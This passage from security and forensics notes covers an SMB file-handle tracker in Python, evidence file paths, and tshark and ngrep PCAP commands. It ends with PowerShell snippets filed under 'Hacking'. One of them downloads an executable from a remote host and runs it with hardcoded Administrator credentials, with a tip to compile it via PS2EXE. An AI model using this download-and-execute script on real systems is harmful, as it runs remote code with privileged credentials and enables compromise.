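            self._emit(row, "close", self.open_handles.pop(handle, "<unknown fid>"))
        elif cmd == LOGOFF and not row["response"]:
            # the UID is only valid for the session: drop every handle that belonged to it
            for key in [k for k in self.open_handles if k[0] == row["uid"]]:
                del self.open_handles[key]
            self._emit(row, "logoff", "")


def file_timeline(text):
    tracker = SmbFileTracker()
    for row in parse_rows(text):
        tracker.feed(row)
    return tracker.timeline


def creates_per_fid(text):
    """Number of NT Create responses that returned each FID value; >1 shows reuse."""
    seen = {}
    for row in parse_rows(text):
        if row["cmd"] == NT_CREATE and row["response"]:
            seen[row["fid"]] = seen.get(row["fid"], 0) + 1
    return seen


# Constructed capture: one session (uid 2048, tid 1) opens, reads and closes
# \docs\salary.xlsx, then opens, writes and closes \docs\notes.txt; the server
# returns FID 0x4001 both times, so grouping by FID alone would merge the two files.
ROWS = r"""
14|0xa2|0|996|5|2048|1||\docs\salary.xlsx
15|0xa2|1|996|5|2048|1|0x4001|
16|0x2e|0|996|6|2048|1|0x4001|
17|0x2e|1|996|6|2048|1|0x4001|
18|0x04|0|996|7|2048|1|0x4001|
20|0xa2|0|996|8|2048|1||\docs\notes.txt
21|0xa2|1|996|8|2048|1|0x4001|
22|0x2f|0|996|9|2048|1|0x4001|
24|0x04|0|996|10|2048|1|0x4001|
26|0x74|0|996|11|2048|0||
"""
```

For SMB2 the same idea applies with smb2.cmd, smb2.sesid, smb2.tid, smb2.fid (a GUID rather than a 16-bit number) and smb2.filename; the pairing key there is smb2.msg_id.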

Collecting log evidence

Firewall files

/etc/sysconfig/iptables

/etc/sysconfig/iptables-config

/etc/rsyslog.conf

/var/log/messages*

IDS files

/etc/sysconfig/snort

/etc/snort/*

/etc/rsyslog.conf

/var/log/snort/*

Squid

/etc/squid/squid.conf

/var/log/squid/*

/var/spool/squid/*

Iptables

-d          destination ip

-i          input interface

-o          output interface

-p          layer 4 protocol

--dport     destination port

--syn       match packets with only the SYN flag set

-j LOG      log matched traffic (LOG is non-terminating: the packet continues to the next rule, so pair it with a second rule that rejects or drops)

-j REJECT   reject matched traffic

SSL Traffic

  • Profile client encryption ciphers (ClientHello = handshake type 1)

tshark -n -r /cases/*pcap -Y 'ssl.handshake.type == 1' -T fields -e ip.src -e ssl.record.version -e ssl.handshake.ciphersuite > /cases/ssl_ciphersuites_by_ip.txt

cat /cases/ssl_ciphersuites_by_ip.txt | awk '{print $3}' | sort | uniq -c | sort -nr

  • Identify SSL certificate subjects

tshark -n -r /cases/*pcap -Y 'ssl.handshake.certificate' -T fields -E separator='|' -E aggregator='|' -e x509ce.dNSName -e x509sat.teletexString -e x509sat.uTF8String -e x509sat.universalString -e x509sat.IA5String | tr -s '|' '\n' | sort | uniq -c | sort -nr

(Wireshark 3.x renamed these fields from ssl.* to tls.*, e.g. tls.handshake.type.)

NGREP

  • Search a PCAP for strings

ngrep -I dump6.pcap -w 'root' -N -t -q

  • Search a PCAP for a hex value

ngrep -I dump6.pcap -xX '0xc5d5e5f55666768696a6b6c6d6e6' -N -t -q

TCPXTRACT

  • Extract files (automatic file carving) from a pcap

tcpxtract -f dump3.pcap

Categories
Hacking PowerShell

PowerShell Download File with Authentication

Download a file from an external site that requires authentication, in PowerShell. WebClient answers the server's Basic/Digest/NTLM challenge with the credential object; over plain http a Basic challenge sends the password across the wire unprotected.

$Url = "http://192.168.20.247/test.test"
$Path = "$env:temp\test.txt"
$Username = ""
$Password = ""

$WebClient = New-Object System.Net.WebClient
$WebClient.Credentials = New-Object System.Net.NetworkCredential($Username, $Password)
$WebClient.DownloadFile($Url, $Path)
notepad $Path

Categories
Hacking PowerShell

PowerShell Download & run-as script

PowerShell script

#Predefine necessary information
$Username = "DOMAIN\Administrator"
$Password = "PASSWORD"

#Create credential object
$SecurePassword = ConvertTo-SecureString -AsPlainText $Password -Force
$Cred = New-Object -TypeName "System.Management.Automation.PSCredential" -ArgumentList $Username, $SecurePassword

#Download file from website
$Url = "http://192.168.20.247/test.test"
$Path = "$env:temp\example.exe"

$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile($Url, $Path)

#Start the downloaded binary as the other user
Start-Process $Path -Credential $Cred

Save as run-as-admin.ps1

The credentials sit in the script in clear text; anyone who can read the file gets them, and PS2EXE only wraps the script, so the compiled .exe still carries them.

If needed, compile your .ps1 file to .exe with PS2EXE

https://gallery.technet.microsoft.com/PS2EXE-Convert-PowerShell-9e4e07f1